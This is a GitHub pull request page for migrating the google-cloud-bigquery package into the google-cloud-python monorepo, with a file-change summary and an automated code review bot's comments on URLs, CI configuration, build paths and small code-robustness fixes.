    • Added Sphinx configuration file for documentation generation.
  • packages/google-cloud-bigquery/docs/dbapi.rst
    • Added reStructuredText document for DB-API reference.
  • packages/google-cloud-bigquery/docs/design/index.rst
    • Added index for client library design documents.
  • packages/google-cloud-bigquery/docs/design/query-retries.md
    • Added design document for query retries.
  • packages/google-cloud-bigquery/docs/enums.rst
    • Added reStructuredText document for BigQuery enums.
  • packages/google-cloud-bigquery/docs/format_options.rst
    • Added reStructuredText document for BigQuery format options.
  • packages/google-cloud-bigquery/docs/generated/google.cloud.bigquery.magics.html
    • Added redirect HTML for BigQuery magics documentation.
  • packages/google-cloud-bigquery/docs/index.rst
    • Added main index for Sphinx documentation.
  • packages/google-cloud-bigquery/docs/job_base.rst
    • Added reStructuredText document for common job resource classes.
  • packages/google-cloud-bigquery/docs/magics.rst
    • Added reStructuredText document for IPython magics.
  • packages/google-cloud-bigquery/docs/query.rst
    • Added reStructuredText document for query resource classes.
  • packages/google-cloud-bigquery/docs/reference.rst
    • Added reStructuredText document for API reference.
  • packages/google-cloud-bigquery/docs/samples
    • Added samples directory for documentation, linking to main samples.
  • packages/google-cloud-bigquery/docs/snippets.py
    • Added Python snippets for documentation examples.
  • packages/google-cloud-bigquery/docs/summary_overview.md
    • Added summary overview markdown for documentation.
  • packages/google-cloud-bigquery/docs/usage.html
    • Added redirect HTML for usage documentation.
  • packages/google-cloud-bigquery/docs/usage/client.rst
    • Added reStructuredText document for client usage.
  • packages/google-cloud-bigquery/docs/usage/datasets.rst
    • Added reStructuredText document for dataset management.
  • packages/google-cloud-bigquery/docs/usage/encryption.rst
    • Added reStructuredText document for encryption usage.
  • packages/google-cloud-bigquery/docs/usage/index.rst
    • Added index for usage guides.
  • packages/google-cloud-bigquery/docs/usage/jobs.rst
    • Added reStructuredText document for job management.
  • packages/google-cloud-bigquery/docs/usage/pandas.rst
    • Added reStructuredText document for Pandas integration.
  • packages/google-cloud-bigquery/docs/usage/queries.rst
    • Added reStructuredText document for query execution.
  • packages/google-cloud-bigquery/docs/usage/tables.rst
    • Added reStructuredText document for table management.
  • packages/google-cloud-bigquery/google/cloud/bigquery/__init__.py
    • Added package initialization file, including version and module imports.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_helpers.py
    • Added shared helper functions for BigQuery API classes.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_http.py
    • Added HTTP connection class for BigQuery.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_job_helpers.py
    • Added helpers for interacting with job REST APIs.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_pandas_helpers.py
    • Added shared helper functions for connecting BigQuery and pandas.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_pyarrow_helpers.py
    • Added shared helper functions for connecting BigQuery and pyarrow.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_tqdm_helpers.py
    • Added shared helper functions for tqdm progress bar integration.
  • packages/google-cloud-bigquery/google/cloud/bigquery/_versions_helpers.py
    • Added shared helper functions for verifying installed module versions.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dataset.py
    • Added dataset classes and related helpers.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/__init__.py
    • Added DB-API package initialization, including connection and cursor classes.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/_helpers.py
    • Added helpers for DB-API parameter formatting and type conversion.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/connection.py
    • Added DB-API connection class.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/cursor.py
    • Added DB-API cursor class.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/exceptions.py
    • Added custom exception classes for DB-API.
  • packages/google-cloud-bigquery/google/cloud/bigquery/dbapi/types.py
    • Added type objects for DB-API.
  • packages/google-cloud-bigquery/google/cloud/bigquery/encryption_configuration.py
    • Added class for custom encryption configuration.
  • packages/google-cloud-bigquery/google/cloud/bigquery/enums.py
    • Added various enum classes for BigQuery operations and types.
  • packages/google-cloud-bigquery/google/cloud/bigquery/exceptions.py
    • Added custom exception classes for BigQuery client.
  • packages/google-cloud-bigquery/google/cloud/bigquery/external_config.py
    • Added classes for external data source configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/format_options.py
    • Added classes for BigQuery format options like Avro and Parquet.
  • packages/google-cloud-bigquery/google/cloud/bigquery/iam.py
    • Added IAM policy definitions for BigQuery.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/__init__.py
    • Added job package initialization, importing various job types and configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/base.py
    • Added base classes and helpers for BigQuery job types.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/copy_.py
    • Added classes for copy jobs and their configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/extract.py
    • Added classes for extract jobs and their configurations.
  • packages/google-cloud-bigquery/google/cloud/bigquery/job/load.py
    • Added classes for load jobs and their configurations.
Activity
  • The pull request description specifies that it should be merged with a merge-commit, not a squash-commit, to preserve git history.

@gemini-code-assist (bot) left a comment
Code Review

This pull request includes changes to the google-cloud-bigquery package, including updates to issue tracker URLs, test matrix configurations, Kokoro build file paths, repository names in contributing guides, and version-specific warnings. It also addresses potential issues with the coverage combine command and flakybot execution in Kokoro. The review comments suggest updating hardcoded URLs to reflect the new monorepo structure, removing premature Python versions from test matrices, improving the robustness of coverage reporting, and ensuring the existence of flakybot before execution. Additionally, the repo field in .repo-metadata.json and URLs in the contributing guide are updated to reflect the new package location, and the version in the contributing guide is updated to be more general.

Note: Security Review is unavailable for this PR.

I am having trouble creating individual review comments, so my feedback is collected below.

packages/google-cloud-bigquery/.github/ISSUE_TEMPLATE/bug_report.md (13)

medium

The issue tracker URL is hardcoded to the old repository name. It should be updated to reflect the new package location within the monorepo, or a more general issue tracker if applicable.

  - Search the issues already opened: https://github.com/googleapis/google-cloud-python/issues?q=is%3Aissue+label%3Acomponent%3Abigquery

packages/google-cloud-bigquery/.github/PULL_REQUEST_TEMPLATE.md (2)

medium

The URL for opening a new issue is hardcoded to the old repository name. It should be updated to reflect the new package location within the monorepo, or a more general issue creation link if applicable.

- [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/google-cloud-python/issues/new/choose?labels=component%3Abigquery) before writing your code!  That way we can discuss the change, evaluate designs, and agree on the general idea

packages/google-cloud-bigquery/.github/workflows/unittest.yml (11)

medium

Including Python 3.14 in the test matrix might be premature as it is not yet officially released. This could lead to unexpected build failures or instability. Consider removing it until it reaches a stable release, or explicitly target a pre-release version if that's the intent.

        python: ['3.9', '3.10', '3.11', '3.12', '3.13']

packages/google-cloud-bigquery/.github/workflows/unittest.yml (40)

medium

Similar to the general unit test matrix, including Python 3.14 here might be premature. Consider removing it until it reaches a stable release.

        python: ['3.9']

packages/google-cloud-bigquery/.github/workflows/unittest.yml (87)

medium

The coverage combine command might not correctly locate the .coverage files if unzip extracts them into subdirectories (e.g., .coverage-results/coverage-artifact-3.9/.coverage-3.9). It's more robust to use find to locate the files explicitly.

        coverage combine $(find .coverage-results -type f -name '.coverage*')

packages/google-cloud-bigquery/.kokoro/build.sh (47-48)

medium

It's good practice to check if flakybot exists before attempting to chmod +x and execute it. This prevents potential errors if the file is missing.

  if [[ -f "$KOKORO_GFILE_DIR/linux_amd64/flakybot" ]]; then
    chmod +x $KOKORO_GFILE_DIR/linux_amd64/flakybot
    $KOKORO_GFILE_DIR/linux_amd64/flakybot
  fi

packages/google-cloud-bigquery/.kokoro/continuous/common.cfg (17)

medium

The build_file path refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

build_file: "packages/google-cloud-bigquery/.kokoro/trampoline.sh"

packages/google-cloud-bigquery/.kokoro/continuous/common.cfg (26)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/build.sh"

packages/google-cloud-bigquery/.kokoro/presubmit/common.cfg (17)

medium

The build_file path refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

build_file: "packages/google-cloud-bigquery/.kokoro/trampoline.sh"

packages/google-cloud-bigquery/.kokoro/presubmit/common.cfg (26)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/build.sh"

packages/google-cloud-bigquery/.kokoro/samples/lint/common.cfg (18)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.10/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.10/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.11/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.11/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.12/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.12/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.13/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.13/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.14/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.14/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.9/common.cfg (24)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples.sh"

packages/google-cloud-bigquery/.kokoro/samples/python3.9/periodic-head.cfg (10)

medium

The TRAMPOLINE_BUILD_FILE value refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    value: "github/packages/google-cloud-bigquery/.kokoro/test-samples-against-head.sh"

packages/google-cloud-bigquery/.kokoro/test-samples-impl.sh (36)

medium

Explicitly using python3.9 might be too restrictive. Consider using python3 or relying on the PATH to find the appropriate Python interpreter, unless 3.9 is a strict requirement for this specific step.

python3 -m pip install --upgrade --quiet nox virtualenv

packages/google-cloud-bigquery/.kokoro/test-samples-impl.sh (79)

medium

Explicitly using python3.9 might be too restrictive. Consider using python3 or relying on the PATH to find the appropriate Python interpreter, unless 3.9 is a strict requirement for this specific step.

    python3 -m nox -s "$RUN_TESTS_SESSION"

packages/google-cloud-bigquery/.repo-metadata.json (10)

medium

The repo field refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    "repo": "googleapis/google-cloud-python/packages/google-cloud-bigquery",

packages/google-cloud-bigquery/CONTRIBUTING.rst (38)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

  ``google-cloud-bigquery`` `repo`_ on GitHub.

packages/google-cloud-bigquery/CONTRIBUTING.rst (41)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

- Clone your fork of ``google-cloud-bigquery`` from your GitHub account to your local

packages/google-cloud-bigquery/CONTRIBUTING.rst (50)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

   # Configure remotes such that you can pull changes from the googleapis/google-cloud-python

packages/google-cloud-bigquery/CONTRIBUTING.rst (63)

medium

The repository name in the contributing guide refers to the old name. It should be updated to reflect the new package location.

  version of ``google-cloud-bigquery``. The

packages/google-cloud-bigquery/CONTRIBUTING.rst (210)

medium

The version google-cloud-bigquery==1.28.0 might be outdated. Consider updating it to the latest relevant version or removing the specific version number if it's meant to be a general example.

The last version of this library compatible with Python 2.7 and 3.5 is
`google-cloud-bigquery==2.x.x`.

packages/google-cloud-bigquery/CONTRIBUTING.rst (241)

medium

The URL for the noxfile.py config refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

.. _config: https://github.com/googleapis/google-cloud-python/blob/main/packages/google-cloud-bigquery/noxfile.py

packages/google-cloud-bigquery/README.rst (15)

medium

The URL for general availability points to the monorepo's README. It should be updated to point to the specific google-cloud-bigquery package's GA status within the monorepo, or a more specific GA policy if available.

.. |GA| image:: https://img.shields.io/badge/support-GA-gold.svg
   :target: https://github.com/googleapis/google-cloud-python/blob/main/packages/google-cloud-bigquery/README.rst#general-availability

packages/google-cloud-bigquery/README.rst (62)

medium

The version google-cloud-bigquery==1.28.0 might be outdated. Consider updating it to the latest relevant version or removing the specific version number if it's meant to be a general example.

The last version of this library compatible with Python 2.7 and 3.5 is
`google-cloud-bigquery==2.x.x`.

packages/google-cloud-bigquery/benchmark/benchmark.py (73)

medium

The _parse_tag function assumes that a colon will always be present in the tag string. If a tag is provided without a value (e.g., `--tag somekeywithnovalue`), `split(":")` will return a list with only one element, and indexing the second element raises an `IndexError`. The function should handle tags without values gracefully.

    parts = tagstring.split(":", 1)
    key = parts[0]
    value = parts[1] if len(parts) > 1 else ""
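A minimal sketch of the defensive parsing the suggestion describes. The function name and return shape are illustrative assumptions; the actual helper in benchmark.py may differ:

```python
def parse_tag(tagstring: str) -> tuple[str, str]:
    """Split a "key:value" tag; a tag without a colon gets an empty value."""
    parts = tagstring.split(":", 1)  # split on the first colon only
    key = parts[0]
    value = parts[1] if len(parts) > 1 else ""
    return key, value
```

With this shape, `parse_tag("somekeywithnovalue")` returns the key with an empty value instead of raising.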

packages/google-cloud-bigquery/benchmark/benchmark.py (229)

medium

Comparing datetime.fromisoformat(time_str) directly to datetime.min might be problematic if time_str is not a valid ISO format string or if datetime.min is not the intended sentinel. It's generally safer to check if time_str is an empty string or a specific sentinel value before conversion, or to use a try-except block for fromisoformat.

    return time_str == datetime.min.isoformat()
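A hedged sketch of the try-except approach the comment recommends. The function name `is_unset` and the choice of sentinel are illustrative assumptions, not the actual benchmark.py code:

```python
from datetime import datetime

# Assumed sentinel: the ISO form of datetime.min, used to mark "no timestamp".
SENTINEL = datetime.min.isoformat()


def is_unset(time_str: str) -> bool:
    """Treat empty strings, the sentinel, and unparseable strings as unset."""
    if not time_str or time_str == SENTINEL:
        return True
    try:
        datetime.fromisoformat(time_str)
    except ValueError:
        return True  # not a valid ISO-8601 string
    return False
```

This avoids calling `datetime.fromisoformat` on input that was never a real timestamp, and degrades gracefully when the string is malformed.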

packages/google-cloud-bigquery/docs/conf.py (159)

medium

The github_repo setting refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

    "github_repo": "google-cloud-python/packages/google-cloud-bigquery",

packages/google-cloud-bigquery/docs/conf.py (241)

medium

The URL for the noxfile.py config refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

.. _config: https://github.com/googleapis/google-cloud-python/blob/main/packages/google-cloud-bigquery/noxfile.py

packages/google-cloud-bigquery/docs/design/query-retries.md (24)

medium

The URL for the api_method parameter refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

was [added via the `api_method`
parameter](https://github.com/googleapis/google-cloud-python/pull/967) and is

packages/google-cloud-bigquery/docs/design/query-retries.md (33)

medium

The URLs for requested features refer to the old repository name or the monorepo. They should be updated to reflect the new package location within the monorepo.

The ability to re-issue a query automatically was a [long](https://github.com/googleapis/google-cloud-python/issues/5555) [requested](https://github.com/googleapis/google-cloud-python/issues/14) [feature](https://github.com/googleapis/google-cloud-python/issues/539). As work ramped up on the SQLAlchemy connector, it became clear that this feature was necessary to keep the test suite, which issues hundreds of queries, from being [too flakey](https://github.com/googleapis/python-bigquery-sqlalchemy/issues?q=is%3Aissue+is%3Aclosed+author%3Aapp%2Fflaky-bot+sort%3Acreated-asc).

packages/google-cloud-bigquery/docs/design/query-retries.md (38)

medium

The URL for re-issuing a query refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

client re-issues a
query](https://github.com/googleapis/google-cloud-python/pull/837) as it was

packages/google-cloud-bigquery/docs/design/query-retries.md (96-97)

medium

The issue URL refers to the old repository name. It should be updated to reflect the new package location within the monorepo.

strictly needed 
([Issue #1122](https://github.com/googleapis/google-cloud-python/issues/1122)
has been opened to investigate this).

packages/google-cloud-bigquery/docs/snippets.py (121-124)

medium

The issue URL for flaky update_table() points to the monorepo. It should be updated to point to the specific google-cloud-bigquery package within the monorepo if possible, or be updated to a more general link if the old issue is no longer relevant.

@pytest.mark.skip(
    reason=(
        "update_table() is flaky "
        "https://github.com/googleapis/google-cloud-python/issues/5589?q=is%3Aissue+label%3Acomponent%3Abigquery"
    )
)

packages/google-cloud-bigquery/docs/snippets.py (158-161)

medium

The issue URL for flaky update_table() points to the monorepo. It should be updated to point to the specific google-cloud-bigquery package within the monorepo if possible, or be updated to a more general link if the old issue is no longer relevant.

@pytest.mark.skip(
    reason=(
        "update_table() is flaky "
        "https://github.com/googleapis/google-cloud-python/issues/5589?q=is%3Aissue+label%3Acomponent%3Abigquery"
    )
)

packages/google-cloud-bigquery/google/cloud/bigquery/__init__.py (128-136)

medium

The warning about Python 3.7 and 3.8 support might be outdated or too broad, given that the unittest.yml file supports Python 3.9+. Consider updating the warning to reflect the actual supported versions or adjusting the CI configuration if 3.7/3.8 are still intended to be supported with a warning.

if sys_major == 3 and sys_minor in (9, 10):
    warnings.warn(
        "The python-bigquery library no longer supports Python 3.9 "
        "and Python 3.10. "
        f"Your Python version is {sys_major}.{sys_minor}.{sys_micro}. We "
        "recommend that you update soon to ensure ongoing support. For "
        "more details, see: [Google Cloud Client Libraries Supported Python Versions policy](https://cloud.google.com/python/docs/supported-python-versions)",
        FutureWarning,
    )

@parthea parthea added the do not merge Indicates a pull request not ready for merge, due to either quality or timing. label Mar 2, 2026